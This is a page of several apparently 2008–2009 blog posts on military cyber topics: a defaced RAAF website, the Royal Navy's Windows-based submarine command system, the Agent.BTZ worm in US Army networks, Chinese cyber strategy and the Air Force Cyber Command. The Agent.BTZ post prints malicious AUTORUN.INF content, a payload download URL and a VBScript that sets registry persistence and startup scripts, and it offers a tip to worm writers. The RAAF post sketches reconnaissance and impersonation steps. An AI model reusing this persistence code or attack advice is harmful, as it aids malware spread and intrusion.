Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Military

The Past, Present and Future of Chinese Cyber Operations

leave a comment »

Out of nowhere, here’s an article I wrote for the Canadian Military Journal. China,  as one of many alleged actors on the frontier of cyber espionage, is best understood by briefly examining the past century, how it influences contemporary cyber operations attributed to Chinese-based actors, and how they could be used against the Canadian Armed Forces in a potential Southeast Asian conflict.

See the full article here: https://www.academia.edu/7633668/The_Past_Present_and_Future_of_Chinese_Cyber_Operations; or

here: http://www.journal.forces.gc.ca/vol14/no3/PDF/CMJ143Ep26.pdf

 

RAAF website defaced

with 3 comments

Atul Dwivedi, an Indian hacker paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.

This accident comes amid a raise in violence targeted towards Indian native in Australia and apparently Dwivedi protested this situation by leaving a message on the website:

“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”

Racist incident in Australia against Indian students has increased in the last months

Racist incident in Australia against Indian students has increased in the last months

This site is now up and running as per normal. Of course the webserver wasn’t connected to any internal network and didn’t contain any classified information according to a spokewoman:

“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information,1

Microsoft products are used in pretty much every Western armed forces. So it’s save to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies as Windows machine and a Windows Server machine means that everything is almost certainly all Microsoft based. Of course we can now verify those claims and according to David M Williams from ITWire2 the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits. Which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The site still has an excellent link to a blog detailing the WebDAV exploit, see below for the link.

It’s not impossible to think that Dwivedi might have tricked someone into giving out too much information also. Social engineering can do lots and is usually easier than technical exploits. The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up on Facebook or another social networking site for some people in the RAAF and then try to pose as them and pose as them.

Then also, why not look for the FTP server? And God knows what else the server is running; maybe a SMTP server also (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, using web vulnerability tools like Nikto could help find misconfigured settings in ASP or forgotten test/setup pages/files. Up to there, only two things are important: information gathering and imagination.

See also:

Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17

WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17


1Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html accessed on 2009-07-16

2 “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ accessed on 2009-07-16

Submarine Command System

with one comment

A press release from BAE Systems announced the installation of the Submarine Command System Next Generation (SMCS NG) on twelve nuclear submarines of the Royal Navy, effectively ending the conversion of the seven Trafalgar-class submarines, four Vanguard-class submarines and one Swiftsure class[1].

The new command system is based on COTS hardware and software products. It uses mainstream PCs and Windows as supporting components. All computers are connected with on a LAN by an Ethernet network using fiber-optic cable. According to The Register, the system will mostly be based on Windows XP[2] although in was initially decided it would be based on Windows 2000.

The role of this system is to store and compile data from various sensors in order to present tactical information for the leadership. It also controls the weaponry:

SMCS NG is designed to handle the growing volume of information available in modern nuclear submarines and to control the sophisticated underwater weapons carried now and in the future. Its core capability is the assimilation of sensor data and the compilation and display of a real time tactical picture to the Submarine Command Team[3].

The SMCS NG system is the descendant of the previous SMCS system that was proposed back in 1983, when the U.K decided to build a new command system for the then-new Trident class. Before, all electronics were custom built by Ferranti. The SMCS would use COTS material to minimize the costs and become fewer dependants on one company. The architecture of the command system was modular and was written in Ada 83. The core of the system contains an Input/Output computer node, a computer that process data from the sensors and weapons systems. There is also the central node, which is used for processing all the data. Each of the central nodes are duplicated to provide of fault-tolerance, with each being dual modular tolerant, which means that hardware components are working in parallel in case one becomes defective. The dual central nodes are connected to each other and they are also connected to Multi Function Consoles, a Main Tactical Display and two Remote Terminals, which provide the Human Computer Interface. The first phase of the project was to install the SMCS on the Vanguard class submarines.

In 1990, it was decided to extend the SMCS to other submarine classes and that the new command system would use UNIX as its base operating system. Because of the Ada architecture, problems arose when the technicians tried to map the SMCS to run-time processes of UNIX. Solaris and SPARC machines were finally selected for Multi Function Consoles. The central nodes kept their original architecture in Ada.

SMCS Multi Function Monitor in a Vanguard Class Submarine

SMCS Multi Function Monitor in a Vanguard Class Submarine

In 2000, the project was completely own by BAE Systems and the move from SPARC computers to PCs. The switch for the operating system was more difficult, as management preferred Windows while the engineers promoted the use of variants of UNIX such as BSD, Linux or Solaris. The main argument for the engineers was that with UNIX, it would be possible to remove all the extra code unneeded for the submarines operations, thus making it more secure. However, the management point of view prevailed and thus was created the “Windows for Warships” label.

Windows was chosen even after the USS Yorktown accident in 1997, in the US. The ship was crippled after the sysadmin entered invalid data into the database thought the Remote Database Manager.[4]

Insert any jokes about Windows controlling nuclear subs into the comments. Thank you.

Clippy Launch Warning Blue Screen of Death

See also:

SMCS“, AllExperts, http://en.allexperts.com/e/s/sm/smcs.htm (accessed on December 17, 2008)

Submarine Command System (SMCS)“, Ultra Electronics, http://www.ultra-ccs.com/systems/smcs/ (accessed on December 17, 2008)

Operating Systems Contracts, Trusted Software?“, Richard Smedly, Linux Format, March 2005, http://www.linuxformat.co.uk/pdfs/LXF64.pro_war.pdf (accessed on December 17, 2008)

Development Drivers in Modern Multi-function Consoles and Cabinets“, Armed Forces International, http://www.armedforces-int.com/categories/military-consoles-and-cabinets/development-drivers-in-modern-multifunction-consoles-and-cabinets.asp (accessed on December 17, 2008)


[1] “Royal Navy’s Submarine Command System Installation Programme Completes Ahead of Time”, BAE Systems, December 15, 2008, http://www.baesystems.com/Newsroom/NewsReleases/autoGen_108111514515.html (accessed on December 17, 2008)

[2] “Royal Navy completes Windows for SubmarinesTM rollout”, Lewis Page, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/ (accessed on December 17, 2008)

[3] Ibid.

[4] “Operating Systems Contracts, Trusted Software? “, Richard Smedly, Linux Format, March 2005, p.72

Written by Jonathan Racicot

December 17, 2008 at 8:00 pm

LATimes: Agent.BTZ Might be Concerted Cyber-Attack

leave a comment »

The Los Angeles Times reports that the reports about the Agent.BTZ worm spreading to the U.S Army networks might be a coordinated attacks originating from Russia[1].

The U.S Central Command is now infected with the worm and a high-classified network has been hit also.

It is unclear if the author of the article thinks that an infection is the same things as an ‘attack’ though. From the article:

“Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement.”

This infection has been report at the beginning of the month. This might just be sensationalism ofrcomplete ignorance from the author who might think than an infection by a worm made in Russia is a deliberate attack.

Officials would not describe the exact threat from agent.btz, or say whether it could shut down computers or steal information. Some computer experts have reported that agent.btz can allow an attacker to take control of a computer remotely and to take files and other information from it.

Then maybe they should just call Symantec or F-Secure or even better, Google it…or this if they are having a hard time..

See also:

“U.S Army Infected by Worm”, Jonathan Racicot, Cyberwarfare Magazine, November 11, 2008, https://cyberwarfaremag.wordpress.com/2008/11/20/us-army-infected-by-worm/

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl


[1] “Cyber-attack on Defense Department computers raises concerns”, Julian E. Barnes, Los Angeles Times,  November 28, 2008, http://www.latimes.com/news/nationworld/iraq/complete/la-na-cyberattack28-2008nov28,0,230046.story (accessed on November 28, 2008)

Written by Jonathan Racicot

November 28, 2008 at 1:23 pm

U.S Army Infected by Worm

with one comment

Wired reports that the U.S Army network is under assault by a variant of the SillyFDC worm called Agent-BTZ [1]. In order to restrain the infection, the U.S. Strategic Command has ban the use of every portable media on its network, this include USB keys, CDs, flash cards, floppies etc… Both the SIPRNet and NIPRNet are affected by this directive.

The SillyFDC worm infects systems through replication, i.e. by copying itself to various locations such as these folders[2]:

  • %System%
  • %Windir%
  • %Temp%
  • %UserProfile%
  • %ProgramFiles%
  • %SystemDrive%
  • %CommonProgramFiles%
  • %CurrentFolder%

Computer Virus Looming

Computer Virus Looming

It will also try to copy itself to any drive connected to the machine by scanning drives A:\ to Z:\, which is why the U.S Army is banning the use of portable media for the time being.  According to F-Secure who first discovered the worm[3], the variant in question will also create these files[4]:

  • %windir%\system32\muxbde40.dll
  • %windir%\system32\winview.ocx
  • %temp%\6D73776D706461742E746C62FA.tmp
  • %windir%\system32\mswmpdat.tlb

It will then install itself into the registry to make sure the worm starts every time the computer is booted. It will also attempt to download a JPG file from http://worldnews.ath.cx/update/img0008/%5BREMOVED%5D.jpg and create an AUTORUN.INF file on each drive on the computer, which contains the following:

[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\\[RANDOM].dll,InstallM
shell\open\Default=1

[RANDOM] is a randomly generated filename for the malicious DLL. Each time a new partition or a new drive is plugged in, Agent.BTZ will infect it immediately.

The SillyFDC worm doesn’t have any payload, as it only replicates itself through systems it finds using physical medias only. But its variant, the Agent.BTZ is a known Trojan dropper. A dropper is the kind of Trojan that will look to download and execute other malware. It’s surprising that it found its way into the U.S Army network. So that might be a tip for any worm/Trojan writer: add physical media replication to your malware like in the good ol’ days before e-mail, as it seems sending it by e-mail or click jacking is pretty well filtered in military networks, but peripherals such as USB keys are still often used by personnel. And this will surely open the eyes of the network admins of the U.S Army: scan anything plugged into the network.

Also, Graham Cluley, senior technology consultant at Sophos advises:

“… that users disable the autorun facility of Windows so removable devices such as USB keys and CD ROMs do not automatically launch when they are attached to a PC”

With whom I agree.

Update:

Since so many people asked me about this worm, I looked deeply into Internet and found this code, which seems to be part of the script of the Silly FDC worm (that’s the best I could do for now). This script basically copy files from one directory to another, renames the core of the worm and put it into another directory and add registry keys. I cannot confirm this as I found this on an Indonesian blog, so if anyone can look into this, please let me know. Thank you. Blog : http://morphians.wordpress.com/category/uncategorized/

Dim fs,rg

Set fs = CreateObject(”scripting.filesystemobject”)
Set rg = CreateObject(”wscript.shell”)

On Error Resume Next

rg.RegWrite “HKCR\.vbs\”, “VBSFile”
rg.RegWrite “HKCU\Control Panel\Desktop\SCRNSAVE.EXE”, 						”C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”
rg.RegWrite “HKCU\Control Panel\Desktop\ScreenSaveTimeOut”, 					“30”
rg.RegWrite “HKCR\MSCFile\Shell\Open\Command\”, 						“C:\WINDOWS\pchealth\Global.exe”
rg.RegWrite “HKCR\regfile\Shell\Open\Command\”, 						“C:\WINDOWS\pchealth\Global.exe”
rg.RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, 				“C:\WINDOWS\system32\dllcache\Default.exe”
rg.RegWrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, 				“C:\WINDOWS\system32\dllcache\Default.exe”
rg.RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”, 				“C:\WINDOWS\system\KEYBOARD.exe”
rg.RegWrite “HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\”, 					“C:\WINDOWS\Fonts\Fonts.exe”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName”,	”Local Group Policy”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath”,	”"
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID”,		”LocalGPO”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName”,		”Local Group Policy”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID”,		”Local”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters”,	”"
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script”,		"C:\WINDOWS\Cursors\Boom.vbs”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID”, 		“LocalGPO”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID”, 		“Local”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script”, 		“C:\WINDOWS\Cursors\Boom.vbs”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID”, 		“LocalGPO”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName”, 		“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID”, 		“Local”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script”, 		“C:\WINDOWS\Cursors\Boom.vbs”

If Not fs.FileExists(”C:\WINDOWS\Fonts\Fonts.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\Fonts\Fonts.exe”)
If Not fs.FileExists(”C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”)
If Not fs.FileExists(”C:\WINDOWS\pchealth\Global.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\pchealth\Global.exe”)
If Not fs.FileExists(”C:\WINDOWS\system\KEYBOARD.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\system\KEYBOARD.exe”)
If Not fs.FileExists(”C:\WINDOWS\system32\dllcache\Default.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\system32\dllcache\Default.exe”)
If Not fs.FileExists(”C:\windows\system32\drivers\drivers.cab.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\system32\drivers\drivers.cab.exe “)
If Not fs.FileExists(”C:\windows\media\rndll32.pif “) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\media\rndll32.pif”)
If Not fs.FileExists(”C:\windows\fonts\tskmgr.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\fonts\tskmgr.exe”)

See also:

“US Army bans USB devices to contain worm”, John Leyden, The Register, November 20, 2008, http://www.theregister.co.uk/2008/11/20/us_army_usb_ban/ (accessed on November 20, 2008)


[1] “Under Worm Assault, Military Bans Disks, USB Drives”, Noah Shachtman, Danger Room, Wired, http://blog.wired.com/defense/2008/11/army-bans-usb-d.html (accessed on November 20, 2008)

[2] “W32.SillyFDC”, Symantec, http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2006-071111-0646-99&tabid=1 (accessed on November 20, 2008)

[3] “Troj/Agent-EMB”, Sophos, http://www.sophos.com/security/analyses/viruses-and-spyware/trojagentemb.html (accessed on November 20, 2008)

[4] “F-Secure Malware Information Pages: Worm:W32/Agent.BTZ”, F-Secure Corporation, http://www.f-secure.com/v-descs/worm_w32_agent_btz.shtml (accessed on November 20, 2008)

Written by Jonathan Racicot

November 20, 2008 at 5:39 pm

Chinese Cyber Warfare to Gain Military Superiority

with 2 comments

Since the 70s, when Deng Xiaoping was the head of China, the People’s Liberation Army tried to modernize itself and cut its size in order to become more efficient. Still, China is still behind when it comes to military even if its defense budget is the second largest after the United States on the planet, with US$57 billion in 2008[1]. According to an article published in Culture Mandala, China could boost its cyber warfare capabilities in order to compensate for their technological backwardness.

It started as soon as in 2003, when it deployed its first cyber warfare units, the “zixunhua budui[2]“. Since, many attacks have been attributed to China, such as Operation Titan Rain in 2003[3]. China hopes that by using asymmetrical warfare, such as information warfare and cyber warfare, it might level other modern armies.

Michael Vickers, Senior Vice President for Strategic Studies at the Center for Strategic and Budgetary Assessments declared that “a Chinese attack on Taiwan could entail special operations and cyber attacks on U.S. regional bases in Japan and South Korea, and might even include cyber attacks on the U.S. homeland that target the U.S. financial, economic, energy, and communications infrastructure[4]“. In the same document, we can read:

“One way to assess this risk is to ask whether a cyber attack by China launched a few days in advance of a clash could prevent U.S. carrier battle groups from deploying to the Taiwan Straits. Launching the attacks too early would create the risk of discovery and countermeasures.[5]

China could boost its cyber warfare capabilities in order to compensate for their technological backwardness

China could boost its cyber warfare capabilities in order to compensate for their technological backwardness

It is clear to me that a nation with a technologically late compared to modern armies have all the advantage to develop asymmetrical warfare. We can assess its effectiveness in Afghanistan and Iraq. And cyber warfare is a perfect way to destabilize modern armies used to technology in their daily operations. But this is far from being easy for both sides, as talented individuals and highly skills hackers are needed to develop this kind of warfare. Terrorists and groups are unlikely to develop a high quality cyber warfare force, although they still can be efficient. China, on the other hand, can and is smart to do it. After all, if a force can disable communications the enemy’s communications networks, such as GPS, emails and phone networks, it can makes a strong army useless. Like a strong man or woman, if the brain can contact the muscle through the nervous system, the body is powerless…

See also:

“How China Will Use Cyber Warfare To Leapfrog in Military Competitiveness“, Jason Fritz, Culture Mandala, Vol. 8, No. 1, October 2008

China’s Military Modernization and Its Impact on the United States and the Asia- Pacific“, U.S.-China Economic and Security Review Commission, 110th Cong, 1st Sess., March 29-30, 2007


[1] “How China Will Use Cyber Warfare To Leapfrog in Military Competitiveness”, Jason Fritz, Culture Mandala, Vol. 8, No. 1, October 2008, pp.29

[2] “Trojan Dragon: China’s Cyber Threat”, John J. Tkacik, Jr., The Heritage Foundation, February 8, 2008, http://www.heritage.org/Research/asiaandthepacific/bg2106.cfm#_ftn6 (accessed November 3, 2008)

[3] “Titan Rain – how Chinese hackers targeted Whitehall”, Richard Norton-Taylor, The Guardian, September 5, 2007, http://www.guardian.co.uk/technology/2007/sep/04/news.internet (accessed November 3, 2008)

[4] China’s Military Modernization and Its Impact on the United States and the Asia- Pacific, U.S.-China Economic and Security Review Commission, 110th Cong, 1st Sess., March 29-30, 2007, p. 2

[5] Ibid. p.144

A Brief Overview of the Cyber Command

leave a comment »

As more and more of the infrastructure of modern societies gets inter networked, the more the authorities are taking notice of the possible disasters that ought to happen if those networks would be attacked and controlled by malicious individuals. Based on that, the U.S Secretary of the Air Force announced the creation of the AFCYBER, the Air Force Cyber Command, whose mission “will be to provide combat ready forces trained and equipped to conduct sustained global operations in and through cyberspace, fully integrated with air and space operations[1]“. Let’s go deeper into that interesting new agency and try to see if it can actually matches the challenges of this century.

Origins

U.S Air Force Cyber Command Shield

U.S Air Force Cyber Command Shield

The United States government released in February 2003 a 76 pages document titled “The National Strategy to Secure Cyberspace”. This document recommended numerous solutions and actions to better protect the American cyberspace.  Among these actions, one of them recommends to “Improve coordination for responding to cyber attacks within the U.S. national security community”[2]. Based on that recommendation, the former U.S Secretary of the Air Force, Michael W. Wynne decided to establish a cyberspace command. He also stated:

“The aim is to develop a major command that stands alongside Air Force Space Command and Air Combat Command as the provider of forces that the President, combatant commanders and the American people can rely on for preserving the freedom of access and commerce, in air, space and now cyberspace[3]

It then has been decided that the 67th Network Warfare Wing and some elements of the 8th Air Force would serves as the core of the new command. It’s interesting to note that the goal of the 67th is “organizes, trains, and equips cyberspace forces to conduct network defense, attack, and exploitation.” Therefore, the Air Force already had an unit trained to conduct cyberspace operations, and more interestingly, this unit was also train to conduct attacks, not only defensive operations. Thus, in 2006 the Air Force Cyberspace Command (Provisional) unit was put into place.  but faced many difficulties. The first came as to define the term “cyberspace”, define the command’s operations, find a location to base the unit, then find the personnel and define all their functions, train them and organize the unit. Those challenges were perfectly summarized when Maj. Gen. William T. Lord answered a Slashdot user about the location of the new command:

I would hope that no matter where it was located, we would still be able to attract the talent needed to work in this exciting command and that all communities see the need to protect this domain[4].”

Attracting specialists and talented individuals is getting harder and harder. The private sector in technology is still offering, for now at least, good opportunities for graduated students.  Maybe that’s why the AFCYBER touted is creation and development with TV ads and advertisement all over the web. A great mistake, as it opened it to greater scrutiny from the public and observers, which would now be able to witness the success or the failure of the new command…

And not only did it have difficulties organizing itself, it was in competition with other similar services of the military, with the Navy (Naval Network Warfare) and Army already having such organizations, without forgetting about organizations such as the National Security Agency (NSA).

Even with the fore mentioned difficulties, “We’ve figured all that out” said General Lord in October this year, “We’ve outlined how to organize cyber forces, i.e., what capabilities fall into, or not into, a cyber organization[5]“.

Dismay

The optimism expressed in Lord’s comment was hard to share. One month earlier, the establishment of the Cyber Command was suspended and the transfers of units were halted[6]. In June, different actors were still discussing if the command should concentrate on defense and protection or if it should also conduct offensive operations[7]. The ever growing size of the command and the confusion about which operations of the unit was to conduct were slowing any progress and all this amid numerous other Air Force scandals about nuclear management, which later caused Wynne to resign from his post.

As by October 8, 2008, the Air Force decided that the Cyber Command will finally be a numbered unit under the Air Force Space Command as told by Staff Gen. Norton A. Schwartz (see previous post “U.S Air Force Cyber Command is Working on a new Roadmap“, October 24, 2008). After 2 years, it seems that very little has been accomplish. We still have no idea of the structure, the size and not even the mission of the unit. Although Colorado Springs[8] is apparently the preferred location, still no official location have been designated.

Will it work?

To be successful any cyber unit must first emphasize on constant research of new vulnerabilities in order to take the lead. It’s not just about looking at logs and waiting for an attack to occur. Any

U.S Navy Network Warfare Logo

U.S Navy Network Warfare Logo

serious cyber warfare unit must cooperate with every actor of the computer security field, not only corporations or universities, but also with hobbyist groups, hackers and phreakers in order to always have the initiative. As information is always distributed at blazing speed through out the net, and that nothing stays secret for long, constant research is needed to discover new vulnerabilities and detailed analysis. Yet, all those actors have been, as far as I know, ignored or forgotten.

Also, offensive is the best defense. Why should a military organization concentrate only on defensive operations?  It even goes against American principles of war, as it ignores the “Offensive” principle, letting the initiative to the enemy. This is clearly not a sound decision. It ignores the basic concepts or warfare. I believe this is mostly due to a certain mentality in the military leadership, which still regards technology as  support for troops instead of a fully fledge battlefield. This reasoning needs to change if we are to develop real cyber warfare operations. This is certainly something the Chinese understood.

I believe it will, if this unit becomes reality, become an administration bloated unit that will miss the point. Quantity is never a remedy to the lack of quality. A small but highly trained and skilled unit of hackers can do a lot more than a legion of technicians. The important part of cyber warfare is always to stay ahead, since that as soon as a hole or exploit is found, the enemy will patch it thus making it obsolete. and therefore, the need to find the next security vulnerability. Therefore, we don’t need a bigger bureaucracy, but more research, more cooperation with existing similar units and agencies and to develop a strong offensive capacity as the Chinese government seemed to have developed. The 67th Network Warfare unit and the Naval Network Warfare Command would be able to implement those capacities with the appropriate funding and support.

This command, which seemed like an important toward cyber warfare, now seems to have become a botched concept that will unlikely be of any use, except for other to look upon and learn from their mistakes. As the U.S Navy also has plans for a Naval Cyber Command[9], they have been a lot quieter about their project, maybe so they won’t suffer the same humiliation as their colleagues.

Conclusion

As governments are realizing the potential threats from a cyber war, agencies are organizing themselves to protect and defend their cyberspace. The U.S Air Force was based on this premise and would have been a good idea…if anyone had any idea of what they were talking about. Instead, it became or will become an administrative burden that failed and that will give no ror little results. In the end, the “Cyber Command” or what’s left of it, will be another organization which goals will be the same as the other agencies already in place, with no new value or innovative ideas…While western nations are struggling to grasp the concept of cyber warfare, others are developing a very well organized and effective effort to disrupt our systems. Cyber war is won by being a step ahead…and we’re not…


[1] Lt. Col. Paul Berg, “AFCYBER: What it will do and why we need it”, March 26, 2008, http://www.afcyber.af.mil/news/commentaries/story.asp?id=123091666 (accessed on October 24, 2008)

[2] The National Strategy to Secure Cyberspace, February 2003, U.S. Department of Homeland Security, p.13

[3] Staff Sgt. C. Todd Lopez, “8th Air Force to become new cyber command”, November 3, 2006, http://www.af.mil/news/story.asp?id=123030505 (accessed on October 24, 2008)

[4] “Air Force Cyber Command General Answers Slashdot Questions”, March 12, 2008,  http://interviews.slashdot.org/article.pl?sid=08/03/12/1427252 (accessed on October 26, 2008)

[5] Karen Petitt, “One year later: Provisional team lays groundwork for Air Force cyber mission assurance”, October 1, 2008, http://www.afcyber.af.mil/news/story.asp?id=123117666 (accessed on October 24, 2008)

[6] Bob Brewin, “Air Force suspends Cyber Command program”, August 12, 2008, http://www.nextgov.com/nextgov/ng_20080812_7995.php (accessed on October 24, 2008)

[7] Noah Shachtman, “Air Force Suspends Controversial Cyber Command”, August 13, 2008, http://blog.wired.com/defense/2008/08/air-force-suspe.html (accessed on October 24, 2008)

[8] Tom Roeder, “ Air Force regroups command’s duties”, October 7, 2008, http://www.gazette.com/articles/command_41568___article.html/air_force.html (accessed on October 26, 2008)

[9] Lewis Page, “US Navy also planning Cyberwar Command”, October 14, 2008, http://www.theregister.co.uk/2008/10/14/us_navy_cyber_too/ (accessed on October 24, 2008)